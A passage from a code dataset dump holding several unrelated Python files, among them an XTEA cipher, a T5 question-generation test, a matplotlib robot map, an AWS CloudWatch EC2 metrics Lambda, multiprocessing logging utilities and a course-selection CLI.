c_uint32(v[1])\n v_sum = c_uint32(0)\n for i in range(run_round):\n v0.value += (((v1.value << 4) ^ (v1.value >> 5)) +\n v1.value) ^ (v_sum.value+k[v_sum.value & 3])\n v_sum.value += delta\n v1.value += (((v0.value << 4) ^ (v0.value >> 5)) +\n v0.value) ^ (v_sum.value+k[(v_sum.value >> 11) & 3])\n return v0.value, v1.value\n\n\ndef decrypt(v, k: List[int], run_round: int = 32):\n v0 = c_uint32(v[0])\n v1 = c_uint32(v[1])\n v_sum = c_uint32(delta * run_round)\n for i in range(run_round):\n v1.value -= (((v0.value << 4) ^ (v0.value >> 5)) +\n v0.value) ^ (v_sum.value+k[(v_sum.value >> 11) & 3])\n v_sum.value -= delta\n v0.value -= (((v1.value << 4) ^ (v1.value >> 5)) +\n v1.value) ^ (v_sum.value+k[v_sum.value & 3])\n\n return v0.value, v1.value\n\n\ndef test():\n raw_data = [1, 2]\n k = [2, 2, 3, 4]\n data = encrypt(raw_data, k)\n de_data = decrypt(data, k)\n print(f'raw_data:{raw_data}')\n print(f'key:{k}')\n print(f'data:{data}')\n print(f'de_data:{de_data}')\n\n","repo_name":"serfend/QQTea","sub_path":"src/QQTEA/xtea.py","file_name":"xtea.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2105388160","text":"import os\n\nfrom transformers import AutoTokenizer, AutoModelForSeq2SeqLM\n\nBASE_PATH = os.getenv(\"PYTHONPATH\", \"/home/sachdeva/projects/exp_calibration/\")\n\nif __name__ == \"__main__\":\n model_path = BASE_PATH + \"t5-base-nq-short-qg-10ep/checkpoint-109150\"\n tokenizer = AutoTokenizer.from_pretrained(\"t5-base\")\n model = AutoModelForSeq2SeqLM.from_pretrained(model_path)\n model.eval()\n hl_token = \"\"\n context = f\"The Super bowl was held at the Levi's Stadium in the {hl_token} New York {hl_token}.\"\n prepared_input = f\"generate question: {context}\"\n features = tokenizer(\n prepared_input,\n max_length=128,\n padding=\"max_length\",\n truncation=True,\n return_tensors=\"pt\",\n )\n # print(features)\n outputs = model.generate(**features, max_length=128, num_beams=2)\n dec_preds = tokenizer.decode(outputs[0], skip_special_tokens=True)\n print(\"The prediction is: \", dec_preds)\n","repo_name":"UKPLab/CATfOOD","sub_path":"src/cf_generation/baseline_generation/evaluation/eval_qg.py","file_name":"eval_qg.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"23789749857","text":"import matplotlib\r\nimport matplotlib.pyplot as plt\r\nplt.ion()\r\nimport numpy as np\r\nimport time\r\n\r\nclass Obj:\r\n def __init__(self,ID, pos, length, depth):\r\n self.ID = ID\r\n self.pos = pos\r\n self.length = length\r\n self.depth = depth \r\n\r\nclass Map:\r\n def __init__(self, Lx, Ly):\r\n self.Lx = Lx\r\n self.Ly = Ly\r\n self.obj = []\r\n self.fig = None \r\n \r\n def draw(self,objs = {}):\r\n car_length = 400\r\n car_width = 300\r\n if len(objs) == 0:\r\n plt.cla()\r\n plt.xlim(self.Lx)\r\n plt.ylim(self.Ly)\r\n return False\r\n if self.fig is None:\r\n #self.fig, ax = plt.subplots(figsize = (9,6))\r\n #print(\"sdfgsdfgds\")\r\n self.fig = plt.figure(figsize = (5, 5*(self.Ly[1]-self.Ly[0])/(self.Lx[1]-self.Lx[0]))) \r\n \r\n #plt.show(block=False)\r\n #plt.close()\r\n else:\r\n plt.cla()\r\n for k, obj in objs.items():\r\n #print(obj.ID, obj.pos, obj.length, obj.depth)\r\n #plt.plot(obj.pos[0],obj.pos[1], 'ro')\r\n if obj.ID == 11: # robot position\r\n rec_corner = [obj.pos[0]+30*np.cos(obj.pos[2]+np.pi)+(car_width/2)*np.cos(obj.pos[2]-np.pi/2),\r\n obj.pos[1]+30*np.sin(obj.pos[2]+np.pi)+(car_width/2)*np.sin(obj.pos[2]-np.pi/2)]\r\n plt.gca().add_patch(plt.Rectangle(rec_corner, car_length, car_width, np.degrees(obj.pos[2]), facecolor='w', edgecolor='b'))\r\n plt.arrow(obj.pos[0], obj.pos[1], np.cos(obj.pos[2]), np.sin(obj.pos[2]), color='r', width=30)\r\n elif obj.ID < 11: # Obstacles\r\n rec_corner = [obj.pos[0]+obj.length/2*np.cos(obj.pos[2]+np.pi)+(obj.depth/2)*np.cos(obj.pos[2]-np.pi/2),\r\n obj.pos[1]+obj.length/2*np.sin(obj.pos[2]+np.pi)+(obj.depth/2)*np.sin(obj.pos[2]-np.pi/2)]\r\n plt.gca().add_patch(plt.Rectangle(rec_corner, obj.length, obj.depth, np.degrees(obj.pos[2]), color = 'k'))\r\n plt.arrow(obj.pos[0], obj.pos[1], np.cos(obj.pos[2]), np.sin(obj.pos[2]), color='r', width=30)\r\n else: # Destination\r\n rec_corner = [obj.pos[0]+obj.length/2*np.cos(obj.pos[2]+np.pi)+(obj.depth/2)*np.cos(obj.pos[2]-np.pi/2),\r\n obj.pos[1]+obj.length/2*np.sin(obj.pos[2]+np.pi)+(obj.depth/2)*np.sin(obj.pos[2]-np.pi/2)]\r\n plt.gca().add_patch(plt.Rectangle(rec_corner, obj.length, obj.depth, np.degrees(obj.pos[2]), color = 'b'))\r\n plt.arrow(obj.pos[0], obj.pos[1], np.cos(obj.pos[2]), np.sin(obj.pos[2]), color='r', width=30)\r\n \r\n plt.xlim(self.Lx)\r\n plt.ylim(self.Ly)\r\n self.fig.canvas.flush_events()\r\n #self.fig.canvas.draw()\r\n \r\n\r\ndef goalFromShelf(shelf, dis):\r\n rec_corner = [shelf.pos[0]+dis*np.cos(shelf.pos[2]+np.pi)-(shelf.depth/2 + 200)*np.cos(shelf.pos[2]-np.pi/2),\r\n shelf.pos[1]+dis*np.sin(shelf.pos[2]+np.pi)-(shelf.depth/2 + 200)*np.sin(shelf.pos[2]-np.pi/2)] \r\n return [rec_corner[0],rec_corner[1],shelf.pos[2]]\r\n\r\n#s1 = Obj(11,[100,100,np.pi/2],300,300)\r\n#s2 = Obj(1,[0,0,np.pi],1000,300)\r\n#s3 = Obj(11,goalFromShelf(s2,s2.length),300,300)\r\n#o = {}\r\n#m = Map([-1500,1500],[-1000,1000])\r\n#o[s1.ID] = s1\r\n#m.draw(o)\r\n#time.sleep(1)\r\n#o[s2.ID] = s2\r\n#m.draw(o)\r\n#time.sleep(1)\r\n#o[s3.ID] = s3\r\n#m.draw(o)\r\n#import math\r\n#curPos = [-1699,-254,1.11]\r\n#desPos = [-682.43,612,-3.11]\r\n#direction = math.atan2(desPos[1] - curPos[1], desPos[0] - curPos[0])\r\n\r\n\r\n","repo_name":"domlocnguyen/Librarian-robot","sub_path":"Map.py","file_name":"Map.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16059112184","text":"\"\"\"\n-*- coding: utf-8 -*-\n@File : maximum-depth-of-binary-tree.py\n@Time : 2022/4/7\n@Author: Tk \n@Software: PyCharm\n\n输入:\n3,9,20,None,None,15,7\n输出:\n3\n\n\"\"\"\nfrom main import list_to_binarytree\n\nnums = input().split(\",\") \n\nbinary_tree = list_to_binarytree(nums)\n\n\nclass Solution:\n def maxDepth(self, root) -> int:\n if root is None:\n return 0\n l = self.maxDepth(root.left)\n r = self.maxDepth(root.right)\n return 1 + max(l, r)\n\n\ns = Solution()\nresult = s.maxDepth(binary_tree)\nprint(result)\n\n\n\n\n","repo_name":"looking-for-my-magic-bean/leetcode","sub_path":"二叉树-8-二刷/maximum-depth-of-binary-tree.py","file_name":"maximum-depth-of-binary-tree.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22801521773","text":"import boto3\nimport json\n\n\ndef lambda_handler(event, context):\n app = MetricEC2()\n app.main()\n\n\nclass MetricEC2(object):\n def __init__(self):\n self.cloudwatch_client = boto3.client('cloudwatch')\n self.ec2_client = boto3.client('ec2')\n self.metric_data_template = 'metric/metric_template.txt'\n self.metric_count_template = 'metric/metric_put_count.txt'\n self.metric_data = []\n\n def set_metric_data(self, file_path, metricname, dimension_value, value_value):\n metric_data = self.read_file(file_path)\n metric_data['MetricName'] = metricname\n metric_data['Dimensions'][0]['Value'] = dimension_value\n metric_data['Value'] = value_value\n self.metric_data.append(metric_data)\n\n def cloudwatch_metric_data_put(self, metric_data_info):\n self.cloudwatch_client.put_metric_data(\n Namespace=metric_data_info['Namespace'],\n MetricData=metric_data_info['MetricData']\n )\n\n def ec2_instances_describe(self):\n response = self.ec2_client.describe_instances(\n )\n return response['Reservations']\n\n def ec2_instance_describe(self, instanceid):\n response = self.ec2_client.describe_instances(\n InstanceIds=[\n instanceid,\n ],\n )\n return response['Reservations']\n\n @staticmethod\n def read_file(path):\n f = open(path, 'r')\n data = f.read()\n f.close()\n data = json.loads(data)\n return data\n\n def main(self):\n metric_data_put = self.read_file(self.metric_data_template)\n metric_data_put['Namespace'] = 'EC2'\n ec2_instances_info = self.ec2_instances_describe()\n ec2_instances_other = ['i-03e49820693fec5dc', 'i-0a21499fb0912a33e']\n for instanceid in ec2_instances_other:\n try:\n instance_info = self.ec2_instance_describe(instanceid)\n ec2_instances_info = ec2_instances_info+instance_info\n except Exception as e:\n print(e.__str__())\n ec2_instance_count = len(ec2_instances_info)\n ec2_instance_running_count = 0\n ec2_instance_stopped_count = 0\n\n for ec2_instance_info in ec2_instances_info:\n status = ec2_instance_info['Instances'][0]['State']['Name']\n if status == \"running\":\n ec2_instance_running_count += 1\n elif status == \"stopped\":\n ec2_instance_stopped_count += 1\n self.set_metric_data(self.metric_count_template, 'EC2InstanceCount', 'EC2Instance', ec2_instance_count)\n self.set_metric_data(self.metric_count_template, 'EC2InstanceRunningCount', 'EC2InstanceRunning', ec2_instance_running_count)\n self.set_metric_data(self.metric_count_template, 'EC2InstanceStoppedCount', 'EC2InstanceStopped', ec2_instance_stopped_count)\n for metric_data in self.metric_data:\n metric_data_put['MetricData'] = [metric_data]\n self.cloudwatch_metric_data_put(metric_data_put)\n\n\n# if __name__ == '__main__':\n# app = MetricEC2()\n# app.main()\n","repo_name":"isjin/aws-python3-boto3","sub_path":"lamdba/cloudwatch_metric_put/cloudwatch_metrics_put_ec2.py","file_name":"cloudwatch_metrics_put_ec2.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21917421080","text":"lijst = ['Jonas', 'Jana', 'Leo', 'Henry', 'Michael']\nprint(lijst)\nprint()\nletter = input('Enter the letter you want to remove. Press Enter if you want to stop: ')\nwhile letter != '':\n lijst_2 = []\n for x in range(5):\n word = ''\n for i in lijst[x]:\n if i != letter:\n word = word + i\n lijst_2.append(word)\n lijst = lijst_2\n print(lijst)\n letter = input('Enter the letter you want to remove. Press Enter if you want to stop: ')","repo_name":"jnoas123/python","sub_path":"examen_nobember/remove_letters.py","file_name":"remove_letters.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72721337974","text":"import logging\nfrom multiprocessing import current_process, managers, Process\nfrom subprocess import Popen\nimport threading\nimport queue\nimport sys\nimport os\nfrom collections import defaultdict\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n\nclass AcquirerProxy(managers.AcquirerProxy):\n _exposed_ = ('acquire', 'release', '__enter__', '__exit__')\n\n\nif 'redis' in sys.modules:\n import redis\n class RedisStorage(redis.Redis):\n access = 'client'\n getLock = redis.Redis.lock\n getRLock = redis.Redis.lock\n\n def start(self):\n return self\n connect = start\n\n # make proxies\n # getValue =\n # getList =\n # getQueue =\n # getJoinableQueue =\n # getEvent =\n # getSemaphore =\n # getBoundedSemaphore =\n # getCondition =\n # getBarrier =\n # getPool =\n # getDict =\n # getArray =\n # getNamespace =\n\n\nclass MPStorage(managers.SyncManager):\n def __init__(self, *args, **kwargs):\n \"\"\"\n :param(s): accepts same parameters as multiprocessing.managers.BaseManager\n \"\"\"\n super().__init__(*args, **kwargs)\n self.access = None\n self._storage = dict()\n\n self.__class__.register(\n 'getQueue',\n lambda k, *a, **kw: self._getitem(k, queue.Queue, *a, **kw)\n )\n self.__class__.register(\n 'getJoinableQueue',\n lambda k, *a, **kw: self._getitem(k, queue.Queue, *a, **kw),\n )\n self.__class__.register(\n 'getEvent',\n lambda k, *a, **kw: self._getitem(k, threading.Event, *a, **kw),\n proxytype=managers.EventProxy\n )\n self.__class__.register(\n 'getLock',\n lambda k, *a, **kw: self._getitem(k, threading.Lock, *a, **kw),\n proxytype=AcquirerProxy\n )\n self.__class__.register(\n 'getRLock',\n lambda k, *a, **kw: self._getitem(k, threading.RLock, *a, **kw),\n proxytype=AcquirerProxy\n )\n self.__class__.register(\n 'getSemaphore',\n lambda k, *a, **kw: self._getitem(k, threading.Semaphore, *a, **kw),\n proxytype=AcquirerProxy\n )\n self.__class__.register(\n 'getBoundedSemaphore',\n lambda k, *a, **kw: self._getitem(k, threading.BoundedSemaphore, *a, **kw),\n proxytype=AcquirerProxy\n )\n self.__class__.register(\n 'getCondition',\n lambda k, *a, **kw: self._getitem(k, threading.Condition, *a, **kw),\n proxytype=managers.ConditionProxy\n )\n self.__class__.register(\n 'getBarrier',\n lambda k, *a, **kw: self._getitem(k, threading.Barrier, *a, **kw),\n proxytype=managers.BarrierProxy\n )\n self.__class__.register(\n 'getPool',\n lambda k, *a, **kw: self._getitem(k, pool.Pool, *a, **kw),\n proxytype=managers.PoolProxy\n )\n self.__class__.register(\n 'getList',\n lambda k, *a, **kw: self._getitem(k, list, *a, **kw),\n proxytype=managers.ListProxy\n )\n self.__class__.register(\n 'getDict',\n lambda k, *a, **kw: self._getitem(k, dict, *a, **kw),\n proxytype=managers.DictProxy\n )\n self.__class__.register(\n 'getValue',\n lambda k, *a, **kw: self._getitem(k, managers.Value, *a, **kw),\n proxytype=managers.ValueProxy\n )\n self.__class__.register(\n 'getArray',\n lambda k, *a, **kw: self._getitem(k, managers.Array, *a, **kw),\n proxytype=managers.ArrayProxy\n )\n self.__class__.register(\n 'getNamespace',\n lambda k, *a, **kw: self._getitem(k, managers.Namespace, *a, **kw),\n proxytype=managers.NamespaceProxy\n )\n\n self.logger = logging.getLogger(\n '.'.join([__name__, type(self).__name__]) + ':' + str(self.address)\n )\n self.logger.addHandler(logging.NullHandler())\n\n def _getitem(self, key, _type, *args, **kwargs):\n if _type not in self._storage.keys():\n self.logger.info(f\"Creating dict for type {_type.__name__}\")\n self._storage[_type] = dict()\n if key not in self._storage[_type].keys():\n self.logger.info(f\"Creating {_type.__name__} for key '{key}'\")\n item = _type(*args, **kwargs)\n self._storage[_type][key] = item\n return self._storage[_type][key]\n\n def start(self, *args, **kwargs):\n back = sys.stderr\n try:\n self.logger.info(\"Server starting...\")\n sys.stderr = os.devnull\n super().start(*args, **kwargs)\n self.access = 'server'\n sys.stderr = back\n self.logger.info(\"Server started.\")\n except EOFError:\n self.logger.warning(\"Server already running.\")\n super().connect()\n self.access = 'client'\n sys.stderr = back\n finally:\n sys.stderr = back\n return self\n\n\n# TODO: pytest MPRunner\nclass MPRunner(object):\n \"\"\"\n # https://pymotw.com/2/multiprocessing/basics.html\n \"\"\"\n logger = logging.getLogger('.'.join([__name__, 'MPRunner']))\n logger.addHandler(logging.NullHandler())\n\n def __init__(self, procs=None):\n self.procs = defaultdict(list)\n self._allprocs = []\n self._active = []\n\n if procs is not None:\n self.register_multiple(procs)\n\n def register_multiple(self, procs):\n if isinstance(procs, dict):\n for k, v in procs.items():\n if v in [None, False, (), {}, []]:\n self.register(k)\n continue\n\n if isinstance(v, dict):\n self.register(k, kwargs=v)\n continue\n\n if isinstance(v, bool):\n self.register(k, daemon=v)\n continue\n\n v = list(v)\n daemon, args, kwargs = False, None, None\n for item in v:\n if isinstance(item, bool):\n daemon = item\n elif isinstance(item, dict):\n kwargs = item\n else:\n args = item\n self.logger.warning((\"register_multiple()\", k, daemon, args, kwargs))\n\n self.register(k, daemon, args, kwargs)\n elif isinstance(procs, (list, tuple)) or hasattr(procs, '__iter__') or hasattr(procs, '__next__'):\n for p in procs:\n self.register(p)\n elif callable(procs) or isinstance(procs, str):\n self.register(procs)\n else:\n raise ValueError(f\"Provide dict, not {type(procs)}\")\n\n def process_start_callback(self, proc):\n self.logger.info(f\"Starting {'daemon ' if proc.daemon else ''}'{proc}' at pid {proc.pid}\")\n\n def process_end_callback(self, proc):\n self.logger.info(f\"Finished process '{proc}' at pid {proc.pid}\")\n\n def register_process(self, process, daemon=None):\n if daemon is not None:\n process.daemon = daemon\n self.procs[process.name].append(process)\n self._allprocs.append(process)\n self.logger.info(f\"Registered process '{process.name}'\")\n return process\n\n def register_function(self, func, daemon=False, args=None, kwargs=None):\n name = getattr(func, '__name__', \"Function\")\n\n pr = self._make_process(name, func, daemon, args, kwargs)\n\n self.procs[pr.name].append(pr)\n self._allprocs.append(pr)\n self.logger.info(f\"Registered function '{pr.name}' {daemon} {args} {kwargs}\")\n return pr\n\n def register_command(self, cmds, daemon=False, args=None, kwargs=None):\n if not isinstance(cmds, str):\n cmds = [c for c in cmds]\n if not all(isinstance(c, str) for c in cmds):\n raise ValueError(f\"Commands must all be strings\")\n cmds = ' '.join(cmds)\n\n pr = self._make_process(cmds, Popen, daemon, args, kwargs)\n\n self.procs[cmds].append(pr)\n self._allprocs.append(pr)\n self.logger.info(f\"Registered command '{pr.name}'\")\n return pr\n\n def _make_process(self, name, func, daemon=False, args=None, kwargs=None):\n args = () if args is None else args\n kwargs = {} if kwargs is None else kwargs\n\n if args and kwargs:\n return Process(name=name, daemon=daemon, target=func, args=args, kwargs=kwargs)\n elif args:\n return Process(name=name, daemon=daemon, target=func, args=args)\n elif kwargs:\n return Process(name=name, daemon=daemon, target=func, kwargs=kwargs)\n else:\n return Process(name=name, daemon=daemon, target=func)\n\n def register(self, process, daemon=False, args=None, kwargs=None):\n if isinstance(process, Process):\n return self.register_process(Process, daemon)\n elif callable(process):\n return self.register_function(process, daemon, args, kwargs)\n elif isinstance(process, (str, list, tuple)) or hasattr(process, '__iter__') or hasattr(process, '__next__'):\n return self.register_command(process, daemon, args, kwargs)\n else:\n raise NotImplementedError(f\"Cannot handle {process}\")\n\n def runSerial(self):\n self.logger.info(f\"Starting {sum(len(p) for p in self.procs.values())} processes.\")\n for name, prs in self.procs.items():\n for pr in prs:\n self.process_start_callback(pr)\n pr.run()\n self.process_end_callback(pr)\n\n def start(self):\n self.logger.info(f\"Starting {sum(len(p) for p in self.procs.values())} processes.\")\n for name, prs in self.procs.items():\n for pr in prs:\n self._active.append(pr)\n pr.start()\n self.process_start_callback(pr)\n\n def shutdown(self, wait_for_daemons=True):\n ps = list(self._allprocs)\n ds = []\n\n if wait_for_daemons is True:\n for p in ps:\n if p.daemon is True:\n ds.append(p)\n ps.remove(p)\n self.logger.info(f\"Allowing {len(ds)} daemons to continue.\")\n\n self.logger.info(f\"Terminating {len(ps)} processes.\")\n for p in ps:\n p.terminate()\n\n self.monitor()\n self.join()\n self.monitor()\n self.logger.info(f\"{type(self).__name__} has shutdown.\")\n\n def join(self, timeout=None):\n self.logger.debug(\"Joining processes\")\n for p in self._allprocs:\n p.join(timeout)\n self.logger.debug(f\"joined {p}\")\n\n def active_children(self):\n return [p for p in self._allprocs if p.is_alive()]\n\n def monitor(self):\n active = self.active_children()\n for was_running in self._active:\n if was_running not in active:\n self._active.remove(was_running)\n self.process_end_callback(was_running)\n\n def loop(self, ignore=None, ignore_daemons=True):\n if ignore is None:\n ignore = []\n if ignore_daemons is True:\n ignore.extend(p for p in self._allprocs if p.daemon is True)\n\n self.monitor()\n\n ps = list(self._active)\n for i in ignore:\n ps.remove(i)\n\n return len(ps) > 0\n\n\nif 'redis' in sys.modules:\n import redis\n address = ('localhost', 6379)\n lockserver = redis.Redis(host=address[0], port=address[1])\n lockserver.ping()\n _getlock = lockserver.lock\nelse:\n address = ('localhost', 12345)\n authkey = b'localhost:12345.__mp_log_handlers'\n lockserver = MPStorage(address, authkey=authkey)\n _getlock = lockserver.getRLock\n\n\ndef _get_stream_identifier(stream):\n def get_name(stm):\n if hasattr(stm, 'buffer'):\n buffer = stm.buffer\n if hasattr(buffer, 'raw'):\n raw = buffer.raw\n if hasattr(raw, 'name'):\n if isinstance(raw.name, str):\n return raw.name\n if hasattr(buffer, 'name'):\n if isinstance(buffer.name, (str, int)):\n return buffer.name\n if hasattr(stm, 'name'):\n if isinstance(stm.name, (str, int)):\n return stm.name\n return None\n\n key = get_name(stream)\n try: key = (current_process().pid, int(key))\n except: pass\n\n if isinstance(key, str):\n key = os.path.abspath(key)\n\n if key is None:\n key = (current_process().pid, str(stream))\n\n return str(key)\n\n\nclass MPStreamHandler(logging.StreamHandler):\n def __init__(self, stream=None, formatter=None, **fmtkw):\n if stream is None:\n stream = sys.stderr\n self.stream = stream\n logging.Handler.__init__(self)\n if formatter is None:\n formatter = MultilineFormatter(**fmtkw)\n self.setFormatter(formatter)\n\n def lock_factory(self, identifier):\n return _getlock(identifier)\n\n def createLock(self):\n if isinstance(lockserver, MPStorage):\n if lockserver._state.value == managers.State.INITIAL:\n lockserver.start()\n\n key = '.'.join([__name__, type(self).__name__]) + ':' + _get_stream_identifier(self.stream)\n self.lock_name = key\n # self.logger.debug(f\"Made key '{key}' for {self.stream}\")\n self.lock = self.lock_factory(key)\n\n def flush(self):\n if self.stream and hasattr(self.stream, \"flush\"):\n self.stream.flush()\n\n def emit(self, record):\n try:\n msg = self.format(record)\n stream = self.stream\n with self.lock:\n stream.write(msg)\n stream.write(self.terminator)\n self.flush()\n except Exception:\n self.handleError(record)\n\n def handle(self, record):\n rv = self.filter(record)\n if rv:\n self.emit(record)\n return rv\n\n\nclass MPFileHandler(MPStreamHandler):\n def __init__(self, filename, mode='a', encoding=None, delay=False,\n formatter=None, **fmtkw):\n filename = os.fspath(filename)\n\n self.baseFilename = os.path.abspath(filename)\n self.mode = mode\n self.encoding = encoding\n self.delay = delay\n if formatter is None:\n formatter = MultilineFormatter(**fmtkw)\n\n if delay:\n logging.Handler.__init__(self)\n self.setFormatter(formatter)\n self.stream = None\n else:\n MPStreamHandler.__init__(self, self._open(),\n formatter=formatter)\n\n filepath = os.path.dirname(self.baseFilename)\n os.makedirs(filepath, exist_ok=True)\n\n def _open(self):\n if not os.path.exists(os.path.dirname(self.baseFilename)):\n os.makedirs(os.path.dirname(self.baseFilename))\n return open(self.baseFilename, self.mode, encoding=self.encoding)\n\n def createLock(self):\n if isinstance(lockserver, MPStorage):\n if lockserver._state.value == managers.State.INITIAL:\n lockserver.start()\n\n key = '.'.join([__name__, type(self).__name__]) + ':' + self.baseFilename\n self.lock_name = key\n # self.logger.debug(f\"Made key '{key}' for {self.stream}\")\n self.lock = self.lock_factory(key)\n\n def emit(self, record):\n try:\n msg = self.format(record)\n with self.lock:\n if self.stream is None:\n self.stream = self._open()\n stream = self.stream\n stream.write(msg)\n stream.write(self.terminator)\n self.flush()\n except Exception:\n self.handleError(record)\n\n\nclass MultilineFormatter(logging.Formatter):\n \"\"\"\n Isnpired by https://stackoverflow.com/a/45217732\n \"\"\"\n def format(self, record: logging.LogRecord):\n save_msg = record.msg\n if not isinstance(save_msg, str):\n save_msg = str(save_msg)\n output = \"\"\n for line in save_msg.splitlines():\n record.msg = line\n output += super().format(record) + \"\\n\"\n output = output[:-1]\n record.msg = save_msg\n record.message = output\n return output\n\n\n__all__ = ['MPStreamHandler', 'MPFileHandler', 'MPStorage', 'MultilineFormatter', 'MPRunner']\nif 'redis' in sys.modules:\n __all__.append('RedisStorage')\n","repo_name":"timjolson/mp_utils","sub_path":"mp_utils.py","file_name":"mp_utils.py","file_ext":"py","file_size_in_byte":16675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5434050569","text":"from practice import sumitems, multitems, maxnum, minnum, listempty, remdups, listnlong, commonmem, rem045\r\n\r\n#items = [6, 8, 3, 2]\r\n#noitems = []\r\n#dups = [5, 4, 4, 3, 5, 6, 6, 6, 7, 7, 8, 99, 99]\r\n#words = [\"car\", \"bus\", \"me\", \"he\", \"she\", \"us\", \"tractor\"]\r\n\r\n\r\n#sumitems(items)\r\n#multitems(items)\r\n#maxnum(items)\r\n#minnum(items)\r\n#listempty(items)\r\n#listempty(noitems)\r\n#remdups(dups)\r\n#listnlong(words, 2)\r\n#commonmem([1, 2, 3, 4], [3, 4, 5])\r\n#rem045(remlist)\r\n\r\n\r\n#print(remlist)\r\n#redlist.pop(2)\r\nredlist = ['zeroth', 'first', 'second', 'third', 'fourth', 'fifth', 'sixth']\r\nprint(enumerate(redlist))\r\n\r\nstr = \"HelloWorld\"\r\nprint(list(enumerate(str)))","repo_name":"spyingcyclops/learnpythonthehardway","sub_path":"practice/practice_test.py","file_name":"practice_test.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30123413941","text":"episode = \"Titanic\"\n\noriginal_srt_file = episode + \".srt\"\nemotion_srt_file = episode + \"_Emotion.srt\"\nemotion_file = episode + \".emotion\"\n\nfr = open(original_srt_file, \"r\")\nfw = open(emotion_srt_file, \"w\")\n\nEMOTIONS = {}\ni = 1\n# Read emotion file\nf = open(emotion_file)\n\nfor line in f:\n\tline = line.strip()\n\tEMOTIONS[i] = line\n\ti += 1\n\nk = 0\ni = 1\n\nfor line in fr:\n\tif k > 1:\n\t\tif k == 2:\n\t\t\tfw.write(EMOTIONS[i])\n\t\t\tfw.write(\"\\n\")\n\telse:\n\t\tfw.write(line)\n\n\tk += 1\n\n\tif line.strip() == \"\":\n\t\tfw.write(\"\\n\")\n\t\tk = 0\n\t\ti += 1\t\n\n","repo_name":"tjdharamsi/NLP-Movie-EmotionMining","sub_path":"keerti_visual/clip_viz.py","file_name":"clip_viz.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"29698235234","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport common\nimport templates\n\n\ndef manage():\n \"\"\"\n 管理平台\n :return:无\n \"\"\"\n school_name = input(\"Enter school name :\").strip()\n school_obj = common.School(school_name)\n while True:\n print(templates.manage_menu)\n choice = input(\">>>\").strip()\n if choice == \"1\":\n name = input(\"Enter teacher name: \").strip()\n course = input(\"Enter course name: \").strip()\n school_obj.hire_teacher(name, course)\n elif choice == \"2\":\n teacher = input(\"Enter teacher name: \").strip()\n grade = input(\"Enter grade name: \").strip()\n school_obj.create_grade(grade, teacher)\n elif choice == \"3\":\n print(\"\\t请输入课程名称、周期和价格,以“|”分割,例如:linux|7 months|7000\")\n course,period,price = input(\">>\").strip().split(\"|\")\n school_obj.create_course(course, period, price)\n common.Course.cat_course(school_obj)\n elif choice == \"4\":\n break\n else:\n print(\"\\t\\033[0;31m请输入正常选项!\\033[0m\")\n continue\n\n\ndef teacher():\n \"\"\"\n 讲师中心\n :return:无\n \"\"\"\n school_name = input(\"Enter school name: \").strip()\n teacher_name = input(\"Enter teacher name: \").strip()\n school_obj = common.School(school_name)\n teacher_obj = common.Teacher(teacher_name, school_obj)\n\n while True:\n print(templates.teacher_menu)\n choice = input(\">>\").strip()\n if choice == \"1\":\n grade = input(\"Enter grade number : \").strip()\n teacher_obj.set_grade(grade)\n elif choice == \"2\":\n teacher_obj.cat_students()\n elif choice == \"3\":\n student_name = input(\"Enter student name :\").strip()\n result = input(\"Enter student result : \").strip()\n teacher_obj.set_result(student_name, result)\n elif choice == \"4\":\n break\n else:\n print(\"\\t\\033[0;31m%s 请输入正常选项!\\033[0m\" % teacher_obj.name)\n continue\n\n\ndef student():\n \"\"\"\n 学员之家\n :return:无\n \"\"\"\n school_name = input(\"Enter school name: \").strip()\n student_name = input(\"Enter student name: \").strip()\n school_obj = common.School(school_name)\n student_obj = common.Student(student_name, school_obj)\n\n while True:\n print(templates.student_menu)\n choice = input(\">>\").strip()\n if choice == \"1\":\n student_obj.enroll()\n elif choice == \"2\":\n money = input(\"Enter tuition : \").strip()\n while not money.isdigit():\n print(\"\\t\\033[0;31m%s 请输入正确缴费金额!\\033[0m\" % student_name)\n money = input(\"Enter tuition : \").strip()\n student_obj.pay_tuition(int(money))\n\n elif choice == \"3\":\n grade = input(\"Enter grade number : \").strip()\n student_obj.set_grade(grade)\n elif choice == \"4\":\n break\n else:\n print(\"\\t\\033[0;31m%s 请输入正常选项!\\033[0m\" % student_obj.name)\n continue\n\n\ndef main():\n \"\"\"\n 选课系统\n :return:无\n \"\"\"\n while True:\n print(templates.first_menu)\n choice = input(\">>\").strip()\n if choice ==\"1\":\n manage()\n elif choice == \"2\":\n teacher()\n elif choice == \"3\":\n student()\n elif choice == \"4\":\n break\n else:\n print(\"\\t\\033[0;31m请输入正常选项!\\033[0m\")\n continue\n\n\nif __name__ == '__main__':\n main()","repo_name":"liuxingrichu/course-system","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34202451847","text":"from os import path\n\n# This import isn't strictly necessary here, but it was added to make sure\n# we use a Qt version compatible with matplotlib. If we try to import certain\n# Qt parts before importing matplotlib there can be import errors.\n# For more information: https://github.com/computationalpathologygroup/ASAP/issues/34\nfrom matplotlib import pyplot\n\nfrom PyQt5.QtWidgets import QMainWindow, QWidget, 